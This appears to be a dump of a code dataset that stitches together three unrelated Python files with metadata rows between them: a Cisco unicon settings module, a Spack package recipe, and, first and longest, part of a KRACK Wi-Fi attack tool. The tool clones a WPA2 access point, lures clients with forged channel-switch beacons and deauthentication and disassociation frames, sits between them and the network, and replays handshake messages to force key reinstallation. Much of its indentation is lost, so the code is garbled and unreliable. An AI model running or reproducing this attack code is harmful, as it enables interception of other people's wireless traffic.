#sending the stored msg 3's
packet_list = client.msg3s
p = self.utils.set_replay_num(client.msg1, get_replay_num(packet_list[0]) + 1)
packet_list.insert(1, p)
for p in packet_list:
self.rouge_sock.send(p)
#resetting the msg3's list and marking the client as attack start
client.msg3s = []
client.attack_start()
else:
				log(STATUS, '''Not got enough EAPOL MSG3's to forward on yet (%s have been queued)'''%len(client.msg3s))
return True
return False
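	#Handles a single frame captured on the rogue channel (the channel the cloned AP operates on)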
def handle_rouge_iface(self):
p = self.rouge_sock.recv()
if p == None: return
# 1. Handle frames sent BY the rouge AP
if p.addr2 == self.real_ap_mac:
#Display all frames sent to the targeted client
if self.t_clientmac is not None and p.addr1 == self.t_clientmac:
self.utils.print_packet(INFO, "Rogue channel", p)
#And display all frames sent to a MitM'ed client
elif p.addr1 in self.Clients:
self.utils.print_packet(INFO, "Rogue channel ", p)
# 2. Handle frames sent TO the AP
elif p.addr1 == self.real_ap_mac:
client = None
#Check if it's a new client that we can MitM
if Dot11Auth in p:
self.utils.print_packet(INFO, "Rogue channel", p, color='green')
self.Clients[p.addr2] = Client(p.addr2, self.utils)
self.Clients[p.addr2].mark_got_mitm()
client = self.Clients[p.addr2]
will_forward = True
log(DEBUG, 'Client set-up complete')
#Otherwise check of it's an existing client
elif p.addr2 in self.Clients:
client = self.Clients[p.addr2]
				if self.sniff != True:
					will_forward = client.should_forward(p)
				else:
					will_forward = True
self.utils.print_packet(INFO, "Rogue channel", p)
#Always display all frames sent by the targeted client
elif p.addr2 == self.t_clientmac:
self.utils.print_packet(INFO, "Rogue channel", p, suffix='--Target')
#If this now belongs to a client we want to krack, this will process the packet further
if client is None: log(DEBUG, 'Client is None object')
if client is not None:
#Save association request for config info
if Dot11AssoReq in p: client.assocreq = p
# Save msg4 so we can complete the handshake after the attack has been carried out
if get_eapol_msg_num(p) == 4: client.msg4 = p
			#getting this far means the client is definitely connected to the rogue AP
client.mark_got_mitm()
if Dot11WEP in p:
self.handle_from_pairwise(client, p)
if will_forward:
# Don't mark client as sleeping when we haven't got two Msg3's and performed the attack
if client.state < Client.Attack_Started:
p.FCfield &= 0xFFEF
self.f_sock.send(p)
				#handling DHCP with scapy if the attack has been successful
#if client.state == [Client.Success_Reinstalled, Client.Success_AllzeroKey, Client.Failed]:
if p.haslayer(DHCP):
self.dhcp.reply(p)
self.group_arp.reply(p)
# 3. Always display all frames sent by or to the targeted client
elif p.addr1 == self.t_clientmac or p.addr2 == self.t_clientmac:
self.utils.print_packet(INFO, "Rogue channel", p)
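	#Handles a single frame captured on the real channel (the channel the legitimate AP operates on)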
def handle_iface(self):
p = self.f_sock.recv()
if p is None: return
#1. Handle frames sent TO the real AP
if p.addr1 == self.real_ap_mac:
#If it's an authentication to the real AP we want to switch the client over to our AP
if Dot11Auth in p:
#shows the auth packet
self.utils.print_packet(INFO, "Real channel ", p, color="orange")
if self.t_clientmac == p.addr2:
log(WARNING, "Client %s is connecting on real channel, injecting CSA beacon to try to correct." % self.t_clientmac)
#it'll be a new client so we want to delete any previous config and start clean
if p.addr2 in self.Clients: del self.Clients[p.addr2]
#Sending two CSA's to switch target to our rouge channel
self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock, target=p.addr2)
self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock)
#adding client to Clients
self.Clients[p.addr2] = Client(p.addr2, self.utils)
self.Clients[p.addr2].update_clientstate(Client.Connecting)
#Remember association request to save connection info
elif Dot11AssoReq in p:
if p.addr2 in self.Clients: self.Clients[p.addr2].assocreq = p
self.utils.print_packet(INFO, 'Real Channel', p, suffix='--saved')
#Clients sending a deauthentication or disassociation to the real AP
elif Dot11Deauth in p or Dot11Disas in p:
self.utils.print_packet(INFO, "Real channel ", p)
if p.addr2 in self.Clients: del self.Clients[p.addr2]
#For all other frames, only display them if they come from the targeted client
elif self.t_clientmac is not None and self.t_clientmac == p.addr2:
self.utils.print_packet(INFO, "Real channel ", p)
#Prevent the AP from thinking clients that are connecting are sleeping
if p.FCfield & 0x10 != 0 and p.addr2 in self.Clients and self.Clients[p.addr2].state <= Client.Attack_Started:
log(WARNING, "Injecting Null frame so AP thinks client %s is awake" % p.addr2)
null = Dot11(type=2, subtype=4, addr1=self.real_ap_mac, addr2=p.addr2, addr3=self.real_ap_mac)
self.f_sock.send(null)
self.null_frames.append(null)
				#if the client connects to the real channel during the attack, the rogue AP will spam null frames;
				#once several have piled up, send CSA's to try to switch the client back to the rogue channel
				if len(self.null_frames) >= 10:
					self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock, target=p.addr2)
					self.utils.send_csa_beacon(self.rouge_channel, self.beacon, self.f_sock)
					self.null_frames = []
#2. Handle frames sent BY the real AP
elif p.addr2 == self.real_ap_mac:
		#decide whether it'll be forwarded
might_forward = p.addr1 in self.Clients and self.Clients[p.addr1].should_forward(p)
#Deauth and Disas frames are interesting
if Dot11Deauth in p or Dot11Disas in p:
self.utils.print_packet(INFO, "Real channel ", p)
#If targeting a specific client, display all frames it sends
elif self.t_clientmac is not None and self.t_clientmac == p.addr1:
self.utils.print_packet(INFO, "Real channel ", p)
#For other clients, just display what might be forwarded
elif might_forward:
self.utils.print_packet(INFO, "Real channel ", p)
#This is where the frames get forwarded on or not
if might_forward:
if p.addr1 in self.Clients:
client = self.Clients[p.addr1]
				#Handles the key reinstallation for frames going TO the client
if self.handle_to_pairwise(client, p):
pass
elif Dot11Deauth in p:
del self.Clients[p.addr1]
self.rouge_sock.send(p)
else:
self.rouge_sock.send(p)
else:
self.rouge_sock.send(p)
# 3. Always display all frames sent by or to the targeted client
elif p.addr1 == self.t_clientmac or p.addr2 == self.t_clientmac:
self.utils.print_packet(INFO, "Real channel ", p)
def run(self):
self.netconfig = Network_Config()
self.config_interface()
#creating the sockets to run hostapd and capture packets
self.rouge_sock = MitmSocket(type=ETH_P_ALL, iface=self.rouge_iface_mon, verb=self.big_verbose)
		self.f_sock = MitmSocket(type=ETH_P_ALL, iface=self.iface, verb=self.big_verbose)
		#initialising the Utils class from libclass; this provides utility methods to use
self.utils = Utils(self.iface, self.rouge_iface, self.ssid, log)
		#getting the beacon frame from the real AP
self.beacon, self.real_ap_mac = self.utils.find_beacon(self.rouge_sock)
		if self.beacon and self.real_ap_mac == 'ex':
self.restart()
log(DEBUG, 'self.real_ap_mac is: %s'%self.real_ap_mac)
#extracting the info we need from the beacon
self.netconfig.get_beacon_info(self.beacon)
#checking compatibility
if self.sniff == False:
if not self.netconfig.check_wparsn():
log(ERROR, '''%s isn't a WPA1/2 secured network, Exiting....'''%self.ssid)
self.restart()
elif self.netconfig.real_channel > 13:
				log(WARNING, '''%s is operating on 5GHz. The attack isn't tested on this frequency, but we'll try anyway'''%self.ssid)
#if the target AP is compatible this writes the config file for hostapd to clone the AP
with open("hostapd_rogue.conf", "w") as fp:
fp.write(self.netconfig.write_config(self.rouge_iface))
#setting the mac addr of the rouge interface, and the ack interface if there's a target
self.utils.set_mac_address(self.rouge_iface, self.real_ap_mac)
if self.iface_client_ack: subprocess.check_output(["ifconfig", self.iface_client_ack, "up"])
		#BPF filter will increase performance. Latency isn't something that you want on a rogue AP
bpf = "(wlan addr1 {apmac}) or (wlan addr2 {apmac})".format(apmac=self.real_ap_mac)
if self.t_clientmac:
bpf += " or (wlan addr1 {clientmac}) or (wlan addr2 {clientmac})".format(clientmac=self.t_clientmac)
bpf = "(wlan type data or wlan type mgt) and (%s)" % bpf
self.rouge_sock.attach_filter(bpf)
self.f_sock.attach_filter(bpf)
self.rouge_channel = self.netconfig.get_rouge_channel()
		#starting the hostapd daemon
try:
self.hostapd = subprocess.Popen(['../hostapd/hostapd', './hostapd_rogue.conf'])
#give time for hostapd to startup so we can attach to it
time.sleep(2)
except OSError:
log(ERROR, '''ERROR: Could not find the hostapd client, check hostapd's directory, did you compile?''')
raise
except Exception as e:
			log(ERROR, '''ERROR: Couldn't open hostapd, did you disable wifi in networking/compile the hostapd daemon?\nEXCEPTION: %s'''%e)
raise
time.sleep(1)
#connecting to the hostapd control interface
try:
path = ('hostapd_ctrl/'+self.rouge_iface)
self.hostapd_ctrl = Ctrl(path)
self.hostapd_ctrl.attach()
except Exception as e:
			log(ERROR, 'FATAL ERROR: Could not attach to hostapd control interface\nEXCEPTION: %s'%e)
self.restart()
raise
#DHCP can be handled with scapy
self.dhcp = DHCP_sock(sock=self.rouge_sock,
domain='testing.com',
pool=Net('192.168.100.0/24'),
network='192.168.100.0/24',
gw='192.168.100.254',
renewal_time=600,
lease_time=3600)
#setting the interface to the right IP
subprocess.check_output(["ifconfig", self.rouge_iface, "192.168.100.254"])
#some more IP config
self.group_ip = self.dhcp.pool.pop()
self.group_arp = ARP_sock(sock=self.rouge_sock, IP_addr=self.group_ip, ARP_addr=self.real_ap_mac)
#configuring internet forwarding
self.config_internet(self.rouge_iface)
		#Sending Channel Switch Announcement (CSA) beacons to any connected clients
self.utils.send_csa_beacon(self.netconfig.rouge_channel, self.beacon, self.f_sock, 5)
		#Deauth all clients so they connect to the rogue AP
log(INFO, 'Deauthing connected clients')
self.utils.client_deauth(self.f_sock, 2, silent=True)
if self.t_clientmac:
self.queue_disas(self.t_clientmac)
log(STATUS, 'Waiting on stations to connect')
		#The main event loop: this will monitor both interfaces for incoming frames, and send any queued
		#disassociation frames to clients
while True:
#monitoring both interfaces
sel = select.select([self.rouge_sock, self.f_sock], [], [], 0.1)
if self.rouge_sock in sel[0]:
self.handle_rouge_iface()
if self.f_sock in sel[0]:
self.handle_iface()
			#sending any queued disassociation frames
while len(self.disas_queue) > 0 and self.disas_queue[0][0] <= time.time():
self.send_disas(self.disas_queue.pop()[1])
	#Queues disassociations to be sent in a timely manner in the event loop
def queue_disas(self, macaddr):
if macaddr in [macaddr for shedtime, macaddr in self.disas_queue]: return
heapq.heappush(self.disas_queue, (time.time() + 0.5, macaddr))
	#Sends disassociation frames to clients
def send_disas(self, macaddr, hush=False):
p = Dot11(addr1=macaddr, addr2=self.real_ap_mac, addr3=self.real_ap_mac)/Dot11Disas(reason=0)
self.f_sock.send(p)
if not hush:
			log(INFO, 'Rogue channel > Injected disassociation frame to %s'%macaddr)
def config_interface(self):
#Just to be sure..
subprocess.check_output(["rfkill", "unblock", "all"])
if self.rouge_iface_mon is None:
subprocess.call(["iw", self.rouge_iface + "mon", "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
#setting the interface to monitor mode
subprocess.check_output(["ifconfig", self.iface, "down"])
subprocess.check_output(["iw", self.iface, 'set', 'type', 'monitor'])
subprocess.check_output(["ifconfig", self.iface, "up"])
		#creating the rogue interface's virtual monitor interface
if self.rouge_iface_mon is None:
self.rouge_iface_mon = self.rouge_iface + 'mon'
subprocess.check_output(["iw", self.rouge_iface, 'interface', 'add', self.rouge_iface_mon, 'type', 'monitor'])
subprocess.check_output(["ifconfig", self.rouge_iface_mon, 'up'])
		#some linux distros don't configure the virtual monitor interface properly; the next few lines
		#make sure it is set up correctly
time.sleep(2)
subprocess.check_output(['ifconfig', self.rouge_iface_mon, 'down'])
subprocess.check_output(['iw', self.rouge_iface_mon, 'set', 'type', 'monitor'])
subprocess.check_output(['ifconfig', self.rouge_iface_mon, 'up'])
		#this sets up an interface to act like the client so it can acknowledge frames
if self.t_clientmac:
log(DEBUG, self.t_clientmac)
self.iface_client_ack = self.iface + 'sta1'
subprocess.check_output(["iw", self.iface, "interface", "add", self.iface_client_ack, "type", "managed"])
set_mac_address(self.iface_client_ack, self.t_clientmac)
else:
			log(WARNING, '''Targeting all clients isn't recommended. Add a target with --target''')
time.sleep(1)
		#shows the final config of the interface for debugging
string = 'interface is: {interface}, rouge interface is: {rouge_interface}, rouge monitor interface is: {rouge_mon_interface}, normal monitor interface is: {mon_interface}, SSID is: {ssid}'.format(interface=self.iface, rouge_interface=self.rouge_iface, rouge_mon_interface=self.rouge_iface_mon, mon_interface=self.iface, ssid=self.ssid)
log(DEBUG, string)
def restart(self):
#restarts services, and ensures everything goes back to defaults
log(INFO, 'Cancelling...')
subprocess.call(['killall', 'hostapd'])
time.sleep(0.5)
log(INFO, 'Restarting services...')
try:
subprocess.check_output(['iw', self.rouge_iface+'mon', 'del'])
subprocess.check_output(['ifconfig', self.rouge_iface, 'down'])
subprocess.check_output(['iw', self.iface+'sta1', 'del'])
except:
log(WARNING, 'No interface to delete')
subprocess.Popen(['service', 'NetworkManager', 'start'])
subprocess.Popen(['service', 'network-manager', 'start'])
subprocess.Popen(['service', 'wpa_supplicant', 'start'])
time.sleep(1.5)
log(STATUS, 'Exiting...')
sys.exit(1)
if __name__ == "__main__":
	#parsing the command-line args from docopt into their
	#respective variables
args = docopt(__doc__, version='v0.9')
rouge_interface = args["<rouge_interface>"]
interface = args["<interface>"]
ssid = args["<ssid>"]
target_client = args['<target_client>']
is_target = args['--target']
execute = args['-k']
Restart = args['-r']
sniffer = args['-s']
verbose = args['-v']
big_verbose = args['--vv']
disable_hw = args['--disable-hw']
#configures verbose logging
if big_verbose:
verbose = True
log = Logging(verbose)
#cleaning the SSID
	if ssid is not None: ssid = ssid.replace('/', ' ')
	#checking if user is root
if os.geteuid():
log(ERROR, 'ERROR: Must be root, exiting...')
sys.exit(0)
#This is the main class
krack = KrackAttack(rouge_interface, interface, target_client, ssid, log, big_verbose, sniffer)
if execute or sniffer:
log(STATUS, 'Killing any process that might get in the way...')
#Prints out an error if aircrack-ng isn't installed
try:
subprocess.check_output(['airmon-ng', 'check', 'kill'])
except Exception as e:
log(WARNING, '''Could not check for processes that might interfere, install aircrack-ng and don't blame me if it crashes''')
subprocess.call(['killall', 'hostapd'])
try:
krack.run()
except KeyboardInterrupt:
krack.restart()
if disable_hw:
disable_hwcrypto()
if Restart:
krack.restart()
| 37.867801 | 338 | 0.710898 |
7c88ca6b83e9b0ce4d503716bed68187818673fa | 8,944 | py | Python | src/unicon/plugins/generic/settings.py | rich-day/unicon.plugins | 6cb9df66dd08d92ef9ebfc7ce8288afb9217b514 | [
"Apache-2.0"
] | 18 | 2019-11-23T23:14:53.000Z | 2022-01-10T01:17:08.000Z | src/unicon/plugins/generic/settings.py | rich-day/unicon.plugins | 6cb9df66dd08d92ef9ebfc7ce8288afb9217b514 | [
"Apache-2.0"
] | 12 | 2020-11-09T20:39:25.000Z | 2022-03-22T12:46:59.000Z | src/unicon/plugins/generic/settings.py | rich-day/unicon.plugins | 6cb9df66dd08d92ef9ebfc7ce8288afb9217b514 | [
"Apache-2.0"
] | 32 | 2020-02-12T15:42:22.000Z | 2022-03-15T16:42:10.000Z | """
Module:
unicon.plugins.generic
Authors:
pyATS TEAM (pyats-support@cisco.com, pyats-support-ext@cisco.com)
Description:
This module defines the Generic settings to setup
the unicon environment required for generic based
unicon connection
"""
from unicon.settings import Settings
from unicon.plugins.generic.patterns import GenericPatterns
genpat = GenericPatterns()
class GenericSettings(Settings):
"""" Generic platform settings """
def __init__(self):
""" initialize
"""
super().__init__()
self.HA_INIT_EXEC_COMMANDS = [
'term length 0',
'term width 0',
'show version'
]
self.HA_INIT_CONFIG_COMMANDS = [
'no logging console',
'line console 0',
'exec-timeout 0'
]
self.HA_STANDBY_UNLOCK_COMMANDS = [
'redundancy',
'main-cpu',
'standby console enable'
]
self.BASH_INIT_COMMANDS = [
'stty cols 200',
'stty rows 200'
]
self.SWITCHOVER_COUNTER = 50
self.SWITCHOVER_TIMEOUT = 500
self.HA_RELOAD_TIMEOUT = 500
self.RELOAD_TIMEOUT = 300
self.RELOAD_WAIT = 240
self.POST_RELOAD_WAIT = 60
self.RELOAD_RECONNECT_ATTEMPTS = 3
self.CONSOLE_TIMEOUT = 60
# When connecting to a device via telnet, how long (in seconds)
# to pause before checking the spawn buffer
self.ESCAPE_CHAR_CHATTY_TERM_WAIT = 0.25
# number of cycles to wait for if the terminal is still chatty
self.ESCAPE_CHAR_CHATTY_TERM_WAIT_RETRIES = 12
# prompt wait delay
self.ESCAPE_CHAR_PROMPT_WAIT = 0.25
# prompt wait retries
# (wait time: 0.25, 0.5, 0.75, 1.0, 1.25, 1.5, 1.75 == total wait: 7.0s)
self.ESCAPE_CHAR_PROMPT_WAIT_RETRIES = 7
# syslog message handling timers
self.SYSLOG_WAIT = 1
# pattern to replace "more" string
# command to continue for more_prompt_stmt
# when changing MORE_REPLACE_PATTERN, please also change unicon/patterns.py more_prompt
self.MORE_REPLACE_PATTERN = r' *--\s?[Mm]ore\s?-- *'
self.MORE_CONTINUE = ' '
# Sometimes a copy operation can fail due to network issues,
# so copy at most this many times.
self.MAX_COPY_ATTEMPTS = 2
self.COPY_INTERRUPT = '\x03'
# If configuration mode cannot be entered on a newly reloaded device
# because HA sync is in progress, wait this many times and for this long
self.CONFIG_POST_RELOAD_MAX_RETRIES = 20
self.CONFIG_POST_RELOAD_RETRY_DELAY_SEC = 9
self.GUESTSHELL_RETRIES = 20
self.GUESTSHELL_RETRY_SLEEP = 5
# Default error pattern
self.ERROR_PATTERN = [r"% Invalid command at",
r"% Invalid input detected at",
r"% String is invalid, 'all' is not an allowed string at",
r"Incomplete command",
r'% Unrecognized host or address.',
r'Error: Could not open file .*',
r'Unable to deactivate Capture.',
]
self.CONFIGURE_ERROR_PATTERN = [r"overlaps with",
r"% Class-map .* is being used",
r'% ?Insertion failed .*',
                                        r'%Failed to add ace to access-list',
                                        r'Insufficient bandwidth .*',
r'BGP is already running; AS is .*',
r'% Failed to commit one or more configuration items.*',
r'% Configuring IP routing on a LAN subinterface is only allowed if that '
r'subinterface is already configured as part of an IEEE 802.10, IEEE 802.1Q, '
r'or ISL vLAN.',
r'% OSPF: Please enable segment-routing globally',
r"% Invalid input detected at '^' marker"
]
# Number of times to retry for config mode by configure service.
self.CONFIG_LOCK_RETRIES = 3
self.CONFIG_LOCK_RETRY_SLEEP = 10
# for bulk configure
self.BULK_CONFIG = False
self.BULK_CONFIG_END_INDICATOR = '!end indicator for bulk configure'
self.BULK_CONFIG_CHUNK_LINES = 50
self.BULK_CONFIG_CHUNK_SLEEP = 0.5
# for execute matched retry on state pattern
self.EXECUTE_MATCHED_RETRIES = 1
self.EXECUTE_MATCHED_RETRY_SLEEP = 0.05
# User defined login and password prompt pattern.
self.LOGIN_PROMPT = None
self.PASSWORD_PROMPT = None
# Maximum number of retries for password handler
self.PASSWORD_ATTEMPTS = 3
# Ignore log messages before executing command
self.IGNORE_CHATTY_TERM_OUTPUT = False
# How long to wait for config sync after an HA reload.
self.POST_HA_RELOAD_CONFIG_SYNC_WAIT = 400
self.DEFAULT_HOSTNAME_PATTERN = genpat.default_hostname_pattern
# Traceroute error Patterns
self.TRACEROUTE_ERROR_PATTERN = [\
'^.*(% )?DSCP.*does not match any topology',
'Bad IP (A|a)ddress', 'Ping transmit failed',
'Invalid vrf', 'Unable to find',
'No Route to Host.*',
'Destination Host Unreachable',
'Unable to initialize Windows Socket Interface',
'IP routing table .* does not exist',
'Invalid input',
'Unknown protocol -',
'bad context', 'Failed to resolve',
'(U|u)nknown (H|h)ost']
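        # Commands used to fingerprint the device OS; their output is matched
        # against the regex fragments in OS_MAPPING below.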
self.LEARN_OS_COMMANDS = [
'show version',
'uname',
]
self.OS_MAPPING = {
'nxos': {
'os': ['Nexus Operating System'],
'platform': {
'aci': ['aci'],
'mds': ['mds'],
'n5k': ['n5k'],
'n9k': ['n9k'],
'nxosv': ['nxosv'],
},
},
'iosxe': {
'os': ['IOS( |-)XE Software'],
'platform': {
'cat3k': ['cat3k'],
'cat9k': ['cat9k'],
'csr1000v': ['csr1000v'],
'sdwan': ['sdwan'],
'nxosv': ['nxosv'],
},
},
'iosxr': {
'os': ['IOS XR Software'],
'platform': {
'asr9k': ['asr9k'],
'iosxrv': ['iosxrv'],
'iosxrv9k': ['iosxrv9k'],
'moonshine': ['moonshine'],
'ncs5k': ['ncs5k'],
'spitfire': ['spitfire'],
},
},
'ios': {
'os': ['IOS Software'],
'platform': {
'ap': ['TBD'],
'iol': ['TBD'],
'iosv': ['TBD'],
'pagent': ['TBD'],
},
},
'junos': {
'os': ['JUNOS Software'],
'platform': {
'vsrx': ['vsrx'],
},
},
'linux': {
'os': ['Linux'],
},
'aireos': {
'os': ['aireos'],
},
'cheetah': {
'os': ['cheetah'],
},
'ise': {
'os': ['ise'],
},
'asa': {
'os': ['asa'],
},
'nso': {
'os': ['nso'],
},
'confd': {
'os': ['confd'],
},
'vos': {
'os': ['vos'],
},
'cimc': {
'os': ['cimc'],
},
'fxos': {
'os': ['fxos'],
},
'staros': {
'os': ['staros'],
},
'aci': {
'os': ['aci'],
},
'sdwan': {
'os': ['sdwan'],
},
'sros': {
'os': ['sros'],
},
'apic': {
'os': ['apic'],
},
'windows': {
'os': ['windows'],
},
}
#TODO
#take additional dialogs for all services
#move all commands to settings
#
| 34.4 | 118 | 0.445326 |
8870b3197c98dff13b9599b3223d5e7266156a3a | 805 | py | Python | var/spack/repos/builtin/packages/py-bottleneck/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 9 | 2018-04-18T07:51:40.000Z | 2021-09-10T03:56:57.000Z | var/spack/repos/builtin/packages/py-bottleneck/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 907 | 2018-04-18T11:17:57.000Z | 2022-03-31T13:20:25.000Z | var/spack/repos/builtin/packages/py-bottleneck/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 29 | 2018-11-05T16:14:23.000Z | 2022-02-03T16:07:09.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyBottleneck(PythonPackage):
"""A collection of fast NumPy array functions written in Cython."""
homepage = "https://pypi.python.org/pypi/Bottleneck/1.0.0"
url = "https://pypi.io/packages/source/B/Bottleneck/Bottleneck-1.0.0.tar.gz"
version('1.2.1', sha256='6efcde5f830aed64feafca0359b51db0e184c72af8ba6675b4a99f263922eb36')
version('1.0.0', sha256='8d9b7ad4fadf9648acc924a6ee522c7cb5b474e75faaad9d90dfd55e2805b495')
depends_on('py-setuptools', type='build')
depends_on('py-numpy', type=('build', 'run'))
depends_on('py-nose', type='test')
| 40.25 | 95 | 0.737888 |